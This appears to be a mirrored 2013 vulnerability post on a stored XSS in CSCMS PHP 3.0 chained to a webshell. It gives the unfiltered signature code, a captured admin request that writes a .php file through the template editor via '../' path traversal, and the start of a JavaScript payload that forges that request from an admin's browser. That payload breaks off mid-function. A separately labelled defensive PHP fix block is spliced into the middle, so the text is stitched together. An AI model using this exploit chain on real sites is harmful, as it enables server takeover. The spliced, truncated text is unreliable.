Cheng's dance CMS PHP 3.0 stored XSS getshell - vulnerability warning - the black bar safety net

2013-10-20T00:00:00
ID MYHACK58:62201341007
Type myhack58
Reporter Anonymous
Modified 2013-10-20T00:00:00

Description

Someone already published a getshell for this CMS; that one was a file-verification problem in the admin backend.

The official site has since patched it, so I went through the source again.

Because the backend login also requires a captcha, I did not look at SQL injection.

There is an XSS.

Vulnerable file: user/member/skin_edit.php

<tr><td style="height:130px;"><span><i>*</i>signature:</span>
<textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?></textarea></td></tr>

user/do.php

if($op=='zl'){ //data
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('sorry, Please put the information on completed!','javascript:history.go(-1);'));
    $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."', CS_Email='".$CS_Email."',
        CS_Sex=".$CS_Sex.", CS_City='".$CS_City."', CS_QQ='".$CS_QQ."', CS_Qianm='".$CS_Qianm."'
        where CS_Name='".$cscms_name."'";
    if($db->query($sql)){
        exit(Msg_Error('congratulations, you successfully modified!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('sorry, failed to modify!','javascript:history.go(-1);'));
    }

The CS_Qianm (signature) value is written to the database without any filtering, and is echoed back into the textarea unescaped, so the XSS is stored.

What looks very odd in the backend is that the template editor lets you write files of arbitrary format.

Captured request:

POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
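Added example (not CSCMS code) showing the two defender-side fixes for the issues above: escaping the signature when it is echoed into the textarea, and restricting the template editor's path and name parameters to an allowlisted extension inside the skins root. The function names, the extension allowlist and the demo directory layout are assumptions.

```php
<?php
declare(strict_types=1);

// Fix 1: escape user-controlled text for an HTML context before echoing it.
// In skin_edit.php this replaces the raw "<?php echo $cscms_qianm?>".
function escape_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Fix 2: constrain what the template editor may write.
// $skinsDir is the skins root; $relPath and $name are the 'path' and 'name'
// request parameters. Returns the resolved target path, or null to reject.
function resolve_template_path(string $skinsDir, string $relPath, string $name): ?string {
    // Bare file name only, with an allowlisted template extension (assumed list).
    if (!preg_match('/\A[A-Za-z0-9_\-]+\.(html|htm|css|js)\z/', $name)) {
        return null;
    }
    $root = realpath($skinsDir);
    $dir  = realpath($skinsDir . '/' . $relPath);
    if ($root === false || $dir === false) {
        return null;
    }
    // The resolved directory must be the skins root itself or lie beneath it,
    // which defeats "../" traversal in the path parameter.
    if ($dir !== $root
        && strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR . $name;
}

// --- Demonstration with constructed inputs ---
$signature = '<script>alert(1)</script>';   // constructed stored-XSS style signature
echo '<textarea name="CS_Qianm">' . escape_html($signature) . "</textarea>\n";

$skins = sys_get_temp_dir() . '/skins_demo';   // constructed skins root
@mkdir($skins . '/index/html', 0700, true);
$cases = [
    ['index/html/', 'aaa.php'],     // the captured request: PHP extension
    ['../../etc/', 'index.html'],   // traversal out of the skins root
    ['index/html/', 'index.html'],  // a legitimate template file
];
foreach ($cases as [$p, $n]) {
    $r = resolve_template_path($skins, $p, $n);
    printf("%-14s %-12s -> %s\n", $p, $n, $r === null ? 'rejected' : $r);
}
```

Checking the extension alone is not enough: the path check is what stops the editor from being pointed outside the skins directory even when the file name looks harmless.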

So construct the JS as follows.

<script>
thisTHost = top.location.hostname;
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
function PostSubmit(url, data, msg) {
    var postUrl = url;
    var postData = data;
    var msgData = msg;
    var ExportForm = document.createElement("FORM");
    document.body.appendChild(ExportForm);
    ExportForm.method = "POST";
    var newElement = document.createElement("input");
    newElement.setAttribute("name", "name");
    newElement.setAttribute("type", "hidden");
    var newElement2 = document.createElement("input");
    newElement2.setAttribute("name", "content");
    newElement2.setAttribute("type", "hidden");
    ExportForm.appendChild(newElement);
    ExportForm.appendChild(newElement2);
    newElement.value = postData;
    newElement2.value = msgData;
